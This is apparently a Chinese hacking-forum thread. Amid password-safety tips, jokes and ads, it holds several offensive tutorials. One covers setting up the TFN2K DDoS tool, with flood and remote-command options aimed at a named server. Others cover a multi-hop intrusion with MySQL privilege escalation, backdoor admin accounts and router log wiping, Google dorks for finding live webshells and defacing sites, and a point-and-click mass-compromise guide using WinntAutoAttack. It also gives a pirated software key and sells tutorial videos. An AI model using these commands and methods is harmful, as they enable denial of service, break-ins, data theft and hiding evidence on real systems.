二、差之毫厘,“盗”之千里—防范远程破解  本地破解虽然比较简单,但因为它在时间和空间上具有很强的局限性,所以决定了采用这种破解方式的盗号者并不常见。相对而言,由于网络的复杂和不确定性,QQ密码在网络中被盗走的情况更容易发生。那么对于让人眼花缭乱的远程破解方式,我们应该如何来防范呢?下面就给大家一一细说。  1.防范在线密码破解  远程在线破解QQ密码,其原理仍然是采用穷举技术对键盘所有可能的输入进行猜测,惟一不同之处在于它可以自动和腾讯服务器进行密码核对。所以,对它的防范一要靠腾讯公司对服务器进行防止在线破解的安全设置,二就是用户要设置复杂的密码,这样就可以有效地防止密码在线盗窃了。  2.防范破解  其实我们的电脑被人种木马是件很平常的事,山外有山嘛!但怎样在中了木马病毒后也能安全上QQ呢?笔者认为,首先要做的就是“喜新厌旧”。嗯,不明白?哈哈!其意就是要用最新版的QQ啦!理由很简单:新版的QQ事在旧版的基础上进行的改进,因此在功能方面肯定有很大的改善,而且肯定会在安全方面大作文章。用最新版的QQ,就相当于你无形中打了N多的补丁。这样用起QQ来当然是“Q爽”了。  话说回来 光靠QQ版本新是不够的 下面咱们来看看如何对QQ进行安全设置。首先在登录输人密码时,要用上QQ提供的软键盘,因为大部分的盗“QQ”软件是靠在后台记录你的击键动作来偷盗QQ密码的。用软键盘输人密码,即使盗“Q”软件能记录鼠标动作,却不容易得到你的真正密码。  三、小心上得万年“Q”— 做好密码保护  下面提供一些常见的技巧和防护方法,大家只要在聊QQ时运用这些技巧,就能在一定程度上减少QQ密码被盗的事情发生。  1.首先当然是提高警惕。很多朋友为了方便、把邮箱、QQ甚至银行账号的密码都设为同一个,这是一种很不可取的做法。一旦他人得到了邮箱或OO等任何一个密码,也就等于获知了你在网络上的所有隐私。因此,分门别类地设置密码 ,并妥善保管好,是每个重视安全的朋友的必然选择。另外,请不要随便点击别人发来的网址,更不要随便打开陌生的图片.程序等,这样可以有效地防止远程盗密的发生。  2.当QQ密码被盗后,如果想拿回,最好的方法就是通过密码保护了。所以千万记住要给自己的QQ申请密码保护,并且记号填写时用的身份证号、密码保护问题及答案等,否则号码被盗再想拿回来,就难了!申请密码保护其实很简单,打开QQ后,点击登录面板的右下角的“申请密码保护”就可以进入申请页面了,接下来就不用我多说了吧!  3.使用优秀的杀毒软件和防火墙,并及时升级病毒库,上网时打开杀毒软件的病毒监控,以及打开防火墙,因为很多盗QQ密码的恶软件在得到了QQ密码后都回往外发邮件以通知盗“QQ”者。如果装了防火墙的话,就能有效地拦截该邮件,如果盗“Q”者收不到该邮件,那么即使密码被记录了也没什么危险。  4.经常更换密码。最好是每个月换一次密码。更换时可以根据一个自己熟悉的规律来设置密码(例如根据月份不同来设置末几位等),这样不至于变来变去后连自己都忘记了。  5.颠倒输入密码。假如你的QQ密码是“4008”,在输入时不要按顺序一次输入,因为如果中了木马,键盘操作是会被记录下来的,你可以先输入“408”,然后把光标移到“4”后面再输入“0”,这样你输入的密码依然是“4008”,但在“木马”看来你输入的就是“4080”,从而保护了你的密码。
  这里公布一个小号    http://ll365.  这是空间地址 日志里也许有你感兴趣的文章
  技术专题第一课  软件用的是最有名的DDOS,首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHAT Linux进行测试,本次攻击测试我使用的是FEDORA CORE3。  开始设置服务器:  解压 tar -zxvf tfn2k.tgz  1.安装TFN2K  TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的Linux需要不同的设置。  先修改src/ip.h  注释掉以下部分,否则编译出错。  /*struct in_addr  {  unsigned long int s_   }; */  然后make进行编译  编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td 和 tfn,其中td是守护进程,也是客户机的使用进程。而tfn是服务器控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻 击无效,更改密码可以执行mkpass进行更改。最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中记录 所有的客户机IP地址(用VI编辑一个就可行了),格式为:  192.168.0.1  192.168.0.2  192.168.0.3  IP  IP  .....  然后在主服务器上运行./tfn  2.DDOS攻击实现  ./tfn直接回车大家可以看到一些参数,英文好的朋友估计不用我来多讲了:)  格式./tfn <参数>  无用的参数我们不提,我们来说攻击用的  -f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS  -h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址  -p 后面指定一个端口,不用说了  -c 最关键的参数,一共有11个选相  0 - 停止攻击,发善心用的  1 - 反欺骗等级设定 ,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的,所以不用担心警察抓,哈哈  2 - 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。  3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。  4 - UDP洪水攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。  5 - SYN洪水攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击.  6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。  7 - SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。  8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮番轰炸:)  9 - TARGA3攻击  10 - 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:  ./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目录建立edison,-i后面跟"命令"  参数基本说完,下面攻击  ./tfn -f hostext -c 4 -i   使用hostext文件中记录的主机对163服务器进行UDP攻击(所有的主机中必需已经起动td进程)  ./tfn -f hostext -c 5 -i
-p 80  使用hostext文件中记录的主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)  ./tfn -f hostext -c 6 -i   使用hostext文件中记录的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)  ./tfn -f hostext -c 8 -i   使用hostext文件中记录的主机对163服务器进行ICMP&TCP&UDP轮番攻击(如果对方是sniffer一定哭死)  ./tfn -f hostext -c 0  让所由主机停止攻击  基本说完,最后说说我的测试结果  一对一攻击,攻击方式TCP 连接方式本地 本地CPU13% 被攻击的服务器CPU使用率70%以上,并时时波动  二对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器CPU使用率100%  五对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器死机.本人家里只有6台机器,但如果再多点,几十台机器,一般的个人服务器肯定要死掉了  一对一攻击,攻击方式ICMP 连接方式本地 本地CPU18% 被攻击的服务器CPU使用率96%以上,并时时波动二对一攻击,攻击方式ICMP 连接方式本地 本地单机CPU18% 被攻击的服务器以经无法上网,几乎无法使用,半小时内死机。
  今晚就到这里了 最后来一张网上看到的搞笑图片
给大家欣赏一下  
  您就是一名黑客
  网络入侵,安全第一。一个狡猾、高明的入侵者,不会冒然实行动。他们在入侵时前会做足功课,入侵时会通过各种技术手段保护自己,以防被对方发现,引火烧身。其中,跳板技术是攻击者通常采用的技术。下面笔者结合实例,解析攻击入侵中的跳板技术。  1、确定目标  攻击者在通过扫描工具进行定点(IP)扫描或者对某IP段扫描的过程中发现了该系统(服务器)的某个漏洞,然后准备实施攻击。  比如,笔者通过对某IP段的扫描,发现该IP段IP地址为211.52.*.84的主机存在MYSQL漏洞,可以通过提权获取系统权限进而控制该服务器。  2、设计跳板  跳板通俗讲就是一条通往目标主机的主机链,理论上讲当然是链越长就越安全,但是链太长的话连接的速度太慢,因为其中的中转太多。攻击者往往会评估入侵风险,从而制定或者设计跳板。一般的原则是,如果是政府、军队等敏感部门往往跳板会比较多,甚至这些跳板主机会纵横七大洲四大洋。另外,入侵国内服务器往往也会需要国外的跳板主机。  另外跳板主机的选择,入侵者往往是一些安全性一般速度较快,很少有人光顾的主机。因为如果是跳板出了安全问题,安全人员从中间入手,进行反向追踪,定位入侵者的相对比较容易。  笔者演示进行入侵检测的目标主机是一家韩国的服务器(通过查询),综合考虑,设计了三级跳板,即通过三个主机中转在第三级跳板上进行目标主机的入侵就爱你从。设计的路线为:远程登陆(3389)到一IP地址为203.176.*.237的马来西亚服务器;然后在该服务器上通过CMD命令登陆到一IP地址为203.115.*.85的印度Cisco路由器;最后该路由器上telnet到一某韩国主机。最后以该韩国服务器为工作平台实施MYSQL提权操作。  特别说明:攻击者往往在跳板中加入路由器或者交换机(比如Cisco的产品),虽然路由器的日志文件会记录登陆IP,但是可以通过相关的命令清除该日志。并且这些日志清除后将永远消失,因为路由器的日志保存在flash中,一旦删除将无法恢复。如果跳板全部用主机的话,虽然也可以清除日志,但是现在的恢复软件往往可以恢复这些日志,就会留下痕迹,网络安全人员可以通过这些蛛丝马迹可能找到自己。  3、跳板入侵  (1).第一跳,远程桌面  开始→运行→mstsc,打开远程桌面连接,输入马来西亚服务器的IP地址203.176.*.237,随后输入用户名、密码即可远程连接到该服务器。  一个非常狡猾高明的的入侵者一般不会用自己平时使用的主机进行远程桌面连接入侵,他们往往通过一些人员流动比较大的公共电脑进行入侵。如果找不到的话,他们一般不会用物理主机,会采用虚拟机系统进行入侵。因为物理主机的入侵会留下痕迹,就算删除格式化也会被恢复。而虚拟机,入侵完成后可以删除,呼之即来,弃之毫不可惜。  (2).第二跳,telnet路由器  打开服务器命令行工具(cmd),输入telnet 203.115.*.85进行连接。该路由器是一Cisco设置了虚拟终端的密码,输入密码进入路由器一般模式。此时即可以通过路由器telnet到下一个跳板。当然最好有该cisco路由器的特权密码,敲入en,然后输入特权密码进入特权模式。因为就算没有进入路由器的特权模式,但路由器还是记录了此次登陆,因此一定要进入特权模式,通过路由器命令清除登陆记录和历史命令。笔者为了安全用SecureCRT(类似telnet)进行登陆。  作为一个狡猾的入侵者,在进入路由器特权模式后,不是马上进入下一跳板。往往通过show user命令查看有没有其他人(特别是管理员)登陆到路由器。如果存在其他登陆,一个谨慎的入侵者往往会放弃该跳板转而用其他的跳板。  (3).第三跳,telnet主机  在路由器特权模式下,输入telnet 203.115.*.85,随后输入用户名及其密码后就telnet到远程主机系统给我们一个shell。  4.提权  至此,我们经过三级跳到达工作平台,然后就在该shell上进行目标主机的MYSQL提权操作。操作平台上笔者已经准备好了进行MYSQL提权的工具。输入命令进行操作,笔者把相关的命令列举出来:  以下内容为程序代码  cd msysql  cd bin  mysql -h 211.52.118.84 -uroot  \. c:\mysql\bin\2003.txt  在工作平台上再打开一个cmd,输入命令  以下内容为程序代码  nc 211.52.118.84 3306  即监听该ip的3306端口,返回一个目标主机的shell,获取该主机的控制权。  在该shell上输入命令建立管理员用户  以下内容为程序代码  net user test test /add  net localgour administrators test /add  下面看看对方是否开了远程桌面连接,在命令行下敲入命令  以下内容为程序代码  netstat -ano  对方开3389端口,即可以进行远程桌面的连接。  由于对方是XP系统,不能多用户远程连接,笔者的入侵检测到此为止。  5、全身而退  入侵完成获得目标主机的管理权限,入侵者就得擦除痕迹,准备撤退了。  (1).由于从目标主机获得的shell反向连接获得的,不会有日志记录,所以不用管直接断开连接。  (2).上传clearlog工具,清除telnet主机上的登陆日志。  (3).输入exit,退出路由器到主机的的telnet连接。在路由器上输入  以下内容为程序代码  clear logging  分别用来清除登陆日志。  (4).退出路由器登陆,通过工具清除远程桌面主机上的登陆日志,然后删除登录用帐户和用户目录,注销用户。  总结:上面笔者结合实例演示了入侵者如何通过跳板进行入侵以及入侵善后的全过程,本文只是从技术的角度对跳板技术进行解析,目的是让有兴趣的读者直观地了解跳板技术的相关细节。当然,跳板技术是博大精深,远非本文所能囊括,但其基本原来都类似,希望文本对大家了解这种技术有所帮助。
  明天继续吧 ,有点累。。。。
  近日发现一云空间还不错,推荐给大家  网站名叫 微空间 免费给1T空间 额外主要的看重是否有FTP这个有 额外还给个免费域名  他这个期限是永久的的,在控制面板直接点免费续费,反正是重复的使劲的点,完全免费的。有做论坛的可以不妨试一试的  【风情推荐】  其实这么长时间也接触了一些免费给开论坛的,除中国站长做的比较好之外,其它的做的好的,倒是没见到多少最起码空间得免费的,另外也给个域名吧,省得费劲对不对,流量嘛得足够用的了,一般的论坛,访问的流量不是很大的话,就足够了。  关键是 服务问题,可以长期的,申请的网站有一些不稳定的因素存在最好不要去申请,这样的不长久的,我就很这个亏的  我推荐的这个免费云空间的,大家申请后,这个需要一些步骤,这个不难的。  网站地址 /  (s)微空间,免费云空间,全国首家
  GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动完成。为了引起大家对GoogleHacking的关注与重视,我们编发了这篇文章希望大家通过对Hack的攻击手段的了解,更好的保护自己的信息安全。本文中重在对GoogleHacking攻击手段的理解,对一些攻击的细节不予详述请谅解
  前言:  2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家分别作了名为You found that on google ? 和google attacks 的主题演讲。经过安全焦点论坛原版主WLJ大哥翻译整理后,个人觉得有必要补充完善一些细节部分。今天向大家讲述的是Google的又一功能:利用搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,甚至可以直接进行傻瓜入侵。  用google来进行“渗透测试”  我们今天渗透测试人员在实施攻击之前,往往会先进行信息搜集工作,而后才是漏洞确认和最终的漏洞利用、扩大战果。在这里我们现在要谈的是:  一、利用google查找被人安装了php webshell后门的主机,并测试能否使用;  二、利用google查找暴露出来的INC敏感信息.  1.查找利用php webshell  我们在google的搜索框中填入:  Code:   intitle:"php shell*" "Enable stderr" filetype:php   (注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中,你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的内容不同)。通过我的检测,这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:  Code:   echo "召唤" & index.jsp   在得到的  Code:   echo \   后再写上:"召唤"  现在看看首页,已经被我们改成: "召唤" 了  我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file & index.html or echo "" & file   echo "test" && file   这样一条条打出来,站点首页就成功被替换了。同样的也可以  Code:   uname -a;cat /etc/passwd   不过有点要注意,有些WEBSHELL程序有问题,执行不了的,比如:  /card/smal ... c_html&command=  http://ramsgaard.net/upload/shell.php   这些站的php是global register off   解决方案:  我们可以利用相关工具进行在互联网进行搜索,如果有信息被滥用,到/remove.html 提交你希望删除的信息,  控制搜索引擎机器人的查询.  2.搜索INC敏感信息  我们在google的搜索框中填入:  Code:   .org filetype:inc   我们现在搜索的是org域名的站点的INC信息(因为google屏蔽掉了搜索"COM"信息,我们还可以搜其他gov,cn,info,tw,jp,edu等等之类的)  PS:我在看许多PHP编程人员在编程时候,都喜欢把一些常写的代码或配置信息,写在一个.inc的文件中,如shared.inc、global.inc、conn.inc等等,当然这是一个很好的习惯,包括PHP官方网站都是如此,但不知你有没有注意到这里面含一个安全隐患问题。   我有一次在写一个PHP代码时,无意中写错了一句话,当我在浏览器里查看此PHP文件时,竟然发现屏幕详细的显示了我所出错的PHP文件路径及代码行。(PHP错误显示配置是开着的.此功能在PHP里是默认的!),这就是说当我们无意写错代码(同样.inc文件也一样) 或者PHP代码解析出问题时,而PHP错误显示又是开着的,客户端的用户就会看到具体url地址的.inc文件。而.url文件如同txt文本一样,当在浏览器中浏览时,就毫无保留地显示了它的内容,而且不少站点在.inc文件写了重要的信息如用户密码之类!包括国内著名海尔公司以及嘉铃摩托公司,我之所以敢公布是因为我本人测试过,/su ***/inc/conn.inc 暴出的数据库ID密码用客户端连不上去,网站关闭了1215,而且防火墙也过滤掉了。  好,INC的知识说完后,我们继续又搜索到了好多,找到一个暴露了MYSQL口令的  我们又可以用客户端登陆上去修改数据了.这里涉及到数据库的知识,我们不谈太多,关于"INC暴露敏感信息"就到这里结束吧   当然我们可以通过一些办法解决:   1,你可以专门对.inc文件进行配置,避免用户直接获取源文件。   2,当然比较好的方法是,加上并且改文件扩展名为.php(PHP可以解析的扩展名),这样客户端就不会获取源文件了。   这里,我将FreeMind绘制的图片用文本表示了.  有关Google Hack的详细信息,帮助我们分析踩点  连接符:  Code:   + - : . * |   操作符:  Code:   "foo1 foo2"   filetype:123      intext:foo   intitle:footitle   allinurl:foo   密码相关  Code:   :“index of”  htpasswd / passwd   filetype:xls username password email   "ws_ftp.log"   "config.php"   allinurl:admin mdb   service filetype:pwd (frontpage)   敏感信息:  Code:   "robots.tx"   "disallow:"  filetype:txt   inurl:_vti_cnf (frontpage files)  allinurl:/msadc/samples/selector/showcode.asp  allinurl:/examples/jsp/snp/snoop.jsp  allinurl:phpsysinfo  ipsec filetype:conf  intitle:"error occurred" odbc request where (select|insert)  "" nessus report  "report generated by"   结尾:  如果要拿ROOT权限就要具体问题具体分析了,不过有了SHELL权限就好提了,网上有很多根据WEBSHELL提升权限的文章大家可以参照一下。  通过google我们还可以搜索到很多有用的东西,不过是细节,要通过信息收集慢慢分析、扩大、进行入侵.
  今天教大家一个Windows XP使用100%网速的方法  因为平时Windows XP自动保留20%的网速  开始菜单里点击”运行”,输入gpedit.msc指令后确定,会出现一个小屏幕,然后单击计算机配置–管理模板–网络–QoS数据计划程序,选“限制可保留带宽”,“设置”选“已启用”,将“带宽限制”中的20改为0,“应用”,就可以使用100%的网速
  黑客技术专题第4课:黑客常用的攻击方式及特征分析
  如今,网络上的黑客攻击已经成了家常便饭,自动攻击和计算机蠕虫病毒正以闪电般的速度在网络上蔓延。黑客对网络的攻击方式是多种多样的,一般来讲,攻击总是利用“系统配置的缺陷”,“操作系统的安全漏洞”或“通信协议的安全漏洞”来进行的。到目前为止,已经发现的攻击方式超过2000种,其中对绝大部分黑客攻击手段已经有相应的解决方法,这些攻击大概可以划分为以下六类:   1,拒绝服务攻击:一般情况下,拒绝服务攻击是通过使被攻击对象(通常是工作站或重要服务器)的系统关键资源过载,从而使被攻击对象停止部分或全部服务。目前已知的拒绝服务攻击就有几百种,它是最基本的入侵攻击手段,也是最难对付的入侵攻击之一,典型示例有SYN Flood攻击、Ping Flood攻击、Land攻击、WinNuke攻击等。   2,非授权访问尝试:是攻击者对被保护文件进行读、写或执行的尝试,也包括为获得被保护访问权限所做的尝试。   3,预探测攻击:在连续的非授权访问尝试过程中,攻击者为了获得网络内部的信息及网络周围的信息,通常使用这种攻击尝试,典型示例包括SATAN扫描、端口扫描和IP半途扫描等。   4,可疑活动:是通常定义的“标准”网络通信范畴之外的活动,也可以指网络上不希望有的活动,如IP Unknown Protocol和Duplicate IP Address事件等。   5,协议解码:协议解码可用于以上任何一种非期望的方法中,网络或安全管理员需要进行解码工作,并获得相应的结果,解码后的协议信息可能表明期望的活动,如FTU User和Portmapper Proxy等解码方式。  6,系统代理攻击:这种攻击通常是针对单个主机发起的,而并非整个网络,通过RealSecure系统代理可以对它们进行监视。   为了掌握黑客攻击的主要特征并阻止攻击企图,ForeScout公司开发了一种叫做ActiveScout的防入侵技术,它有助于查明黑客的企图并防止网络攻击。据它对黑客攻击的观测统计发现,现在具有黑客行为的攻击与扫描具有以下特征:   1,约90%的攻击来自蠕虫   由于蠕虫病毒具有自动攻击和快速繁殖的特性,因此,它占网络攻击的大约90%,通常是系统扫描或同步攻击。其中,大部分网络攻击的来源地是美国。根据ActiveScout的数据,这些蠕虫病毒繁殖迅速,扫描和攻击相隔的时间很短,因此无法人为控制。蠕虫病毒也具有反复攻击的特性,它们会寻找同一端口并大规模入侵这些端口。如果人们不对蠕虫病毒采取防范措施,攻击/扫描的成功率将达到30%,即在10次扫描中,有3次能获得结果并可进行攻击。   2,96%的扫描集中在端口   端口扫描在网络扫描中大约占了96%,UDP(User Datagram Protocol)服务次之,占3.7%。除了这两种之外,剩余的0.3%是用户名和密码扫描、NetBIOS域登录信息和SNMP管理数据等。Tel Aviv大学已经开始努力防止蠕虫攻击和对NetBIOS弱点的网络攻击,因为这些攻击可能会感染所有的Windows系统。同时,在发送流量之前,要求ISP对所有的NetBIOS流量进行过滤。   有调查表明:在过去的半年中,存在危险性的Internet流量数量已经增加了2倍;暗噪声主要是由网络探测引起的,45%到55%的可疑行为都是黑客对计算机的扫描造成的;大多数攻击都是自动的,小型程序攻击通常来自以前中毒的计算机;黑客攻击这些网络的主要原因是寻找他们能用来传播垃圾邮件、为非法文件寻找特别存储空间的计算机,或者占用可用于下一次攻击的机器。   3,10种端口最易受攻击   I-Trap组织曾经收集了来自24个防火墙12小时工作的数据,这些防火墙分别位于美国俄亥俄州24个企业内网和本地ISP所提供的Internet主干网之间。其间,黑客攻击端口的事件有12000次之多,下面是攻击的主要端口及对应服务详细情况。   1  135和445  windows rpc  2  57  email  3  ,  代理服务  4  25  smtp服务  5  10000+  未注册的服务  6  161   snmp服务  7  1433   微软sql服务  8  53   dns  9  67   引导程序  10  2847   诺顿反病毒服务
    求大神P成有黑社会的意思
  鼎,不明觉历!  
  选择左下角的“开始”——“程序”——“附件”——“系统工具”——“磁盘碎片整理程序”,下拉菜单中选择“所有的硬盘”然后确定,然后你就等着吧,可以去休息一会了,呵呵。如果以前从来没有运行过这个程序的话,而且你的硬盘很大,那么可能得1个小时多的时间(如果觉得时间长,可以停下来,分几次以后再运行也可以)。这个程序以后应该1个月左右运行一次,第二次以后运行时间就短多了
  1、蜘蛛:能坐享其成,靠的就是那张关系网。2、虾:大红之日,便是大悲之时。3、天平:谁给多一点,就偏向谁。4、瀑布:因居高临下,才口若悬河。5、锯子:伶牙俐齿,专做离间行为。6、气球:只要轻轻一吹,便飘飘然了。7、钟表可以回到起点,却已不是昨天。
  中国现状,句句都是实在的: 穿大街,走小巷,到处都有麻辣烫, 啤酒肚,小平头,大金链子黄鹤楼, 软中华,硬玉溪,头发越短越牛逼, 光膀子,露纹身,做梦全想开大奔, 穿貂皮,挤公交,四处掉毛往下飘, 拿苹果,没有兜,摇摇晃晃招小偷, 交警队,派出所,不找熟人没结果, 聊微信,见网友,本人总比照片丑, 出租车,头一甩,心情不好就拒载, 当领导,是真好,公款消费瞎胡搞, 斯巴鲁,汉兰达,机关牌照没人查, 城管局,执法科,明抢暗夺骗吃喝, 超级稻,有机米,骗来骗去骗自己, 人托人,脸脱脸,专门杀熟跑保险, 拆迁户,死命扛,开发公司雇流氓, 选村长,拉选票,社会大哥最有尿, 铁饭碗,有财政,房子多的都改姓, 爹是官,儿是员,有权代代不愁钱, 卫生局,街道办,办点 B 事先吃饭, 抄电表,收水费,物业收钱不怕累, 教育好,师德高,过年过节收红包, CCTV还有勇气播放一个所谓"扬正气,促和谐"的公益广告。拿红给医生,医生说:"请别侮辱我!"拿红包给法官,法官说:"请别藐视我!"拿红包给老师,老师说:"请别伤害我!"拿红包给警察,警察说:"请你尊重我 "看完广告我默默对电视说:"请别忽悠我……
    我上学的时候怎么没有赶上这班呢
  顶楼主  
  楼主,我能像你学习如何编程建网站吗?,我qq  
  @隐士逍遥
19:37:00  长久以来,存在一个专家级程式员和网络高手的共享文化社群,其历史能够追溯到几十年前第一台分时共享的小型机和最早的ARPAnet实验时期。 这个文化的参和者们创造了“黑客”这个词。 黑客们建起了Internet。黑客们使Unix操作系统成为今天这个样子。黑客们搭起了Usenet。黑客们让WWW正常运转。假如您是这个文化的一部分,假如您已为他作了些贡献,而且圈内的其他人也知道您是谁并称您为一个黑客,那么您就是一名黑客。   黑客精神并不但仅局限于软件黑客文化圈中。有些人同样以黑客态度对待其他事情如电子和音乐---事实上,您能够在任何较高级别的科学和艺术中发现他。软件黑客们识别出这些在其他领域同类并把他们也称作黑客---有人宣称黑客实际上是单独于他们工作领域的。 但在本文中,我们将注意力集中在软件黑客的技术和态度,连同发明了“黑客”一词的哪个共享文化传统之上。   另外更有一群人,  -------------------------  我来晚了,楼主,必须顶!  
  @杜小刚168 45楼
21:58:36  楼主,我能像你学习如何编程建网站吗?,我qq  -----------------------------  有基础么? 没有的话 去  http://www.51zxw.net/study.asp?vip=7596450  这个自学网看看
只能看到最基础的
  初级黑客入侵教程 适合新手初级黑客入侵教程 适合新手   初级黑客入侵教程   1,傻瓜级入侵(不是骂你们哦 比喻下而已)   之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目!   需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是"开始"-"所有程序"-"附件"-"通讯"-"远程桌面连接"   不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太懒了吧,难道下载地址在我脑子里?我不也是要搜吗?   好了,下边我们开始入侵了,下边就是过程:   第一步. 打开WinntAutoAttack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始ip" 里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息".   在"IIS溢出"选项卡里勾上"开 99端口shell",这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在"简单管理员密码"选项卡里勾上"列出所有密码简单的管理帐号"和"上传并安装远程图形控制软件". 在"sql漏洞"选项卡里也一样,就是把三个框都打上勾,就是"列出密码为空的sa帐号""建立系统管理员帐号(shanlu)"和"上传并安装远程图形控制软件".   好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机   ok!一切就绪!点"开始"   更多请到http://ll365.
  第二步. 时间很快就过去了,过了半个小时了吧(要有耐心},我们看看有没有什么结果,点"信息",把上边的"废话框"内容往下拉   主机:218.88.55.55   3389,Windows 2000 Advance Server Terminal 端口开放。   SQL漏洞:   sa帐号密码为空。   建立系统管理员帐号shanlu()成功  哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了!  要是有这样的提示:  主机:218.88.55.55   3389,Windows 2000 Advance Server Terminal 端口开放。   简单管理员密码:   帐号:   TsInternetUser()[Administrators]  就说明用户名是TsInternetUser,密码是,要是括号里什么都没有,就说明密码是空,也就是说括号里的是密码,前边的是用户名.注意,帐户必须要是管理员的帐户,否则登陆不上去!"[Administrators]"告诉我们这是个管理员帐户.  要是有主机提示开了4899端口或提示"安装远程图形控制软件成功",我们就可以用Remote Administrator了!(Remote Administrator需要安装,强烈建议安装后把服务端卸载掉,方法:开始-运行,在"运行"框里填"winnt\system32\ re_server.exe /uninstall",注意是"winnt"还是"windows"就看你的机器系统文件夹是什么了)卸载成功了会弹个对话框出来,说"removed successfully"要是你不卸载,最少也要在安装后给服务端装个密码,因为RA本来不是一个黑客工具,他是一个很方便的远程帮助的工具,甚至比 windows自带的远程帮助工具用着还要舒服,可是,它同时也很象一个木马,有客户端和服务端,所以你要不把服务端卸载或加密码的话,很可能你就成为别人攻击的目标了.  打开ra的客户端,也就是那个带红色"R"的图标,(蓝色的是服务端,不要点)提示要输注册码,一般这个下载的同时在"readme"文件里都能找到,要是找不到,我给你们一个:08le- 2jgMggTuKc8bRD8VVC4OqkNUBRsGES4OdBDAnftk+ki2pQZHmM7lhys  VBux8HE7udeSR0D1E0   长吧哈哈,然后把那个勾勾上,那个勾的意思是下次不再出现这个窗口(都是乱码,晕~~)  进入了RA的主界面,我们点"add new connection to the list"(建立新连接)在弹出来的窗口的两个框上都填上刚才开了4899或安装图形控制软件成功的机器的ip,点ok,看下边多出来一个小电脑的图标没?双击进去,看见什么了?是不是看见人家的屏幕了?人家在干什么你都看的清清楚楚吧哈哈!
  楼主你敢再牛那么一点点么……就一点点就可以了!
  楼主,好样的!  
  公布一个V信号 做微商的技术很厉害的 mc19932
  网络攻击的原理是,运用后台软件,通过互联网找到其他IP地址的计算机,查找系统或软件的漏洞,从进行攻击的方式; 至于软件有很多···找找就知道了,我就不好意思说了!中文俗称“油水界面仪”,UTI分别是指,ullage(空高),temperature(温度),interface(界面)三个英文单词的首个字母。UTI自带探头,尺带上有刻度,当探头接触到油面时,仪器会发出声音,此时读尺带数据就OK了。UTI的出现给原油计量带来了极大的方便。一般网络攻击都分为三个阶段,即攻击的准备阶段、攻击的实施阶段和攻击的善后阶段。 ? 攻击的准备阶段:确定攻击目的、准备攻击工具和收集目标信息。 ? 攻击的实施阶段:实施具体的攻击行动。一般步骤如下: 1. 隐藏自己的位置 2. 利用收集到的信息获取帐号和密码,登陆主机。 3. 利用漏洞或者其他方法获得控制权并窃取网络资源和特权。 ? 攻击的善后阶段:消除攻击的痕迹、植入后门,退出
  五十多个视频教程 喜欢的话联系微信
  mc19932 六十多 打包出售了
请遵守言论规则,不得违反国家法律法规}

我要回帖

更多关于 黑客用的什么语言 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信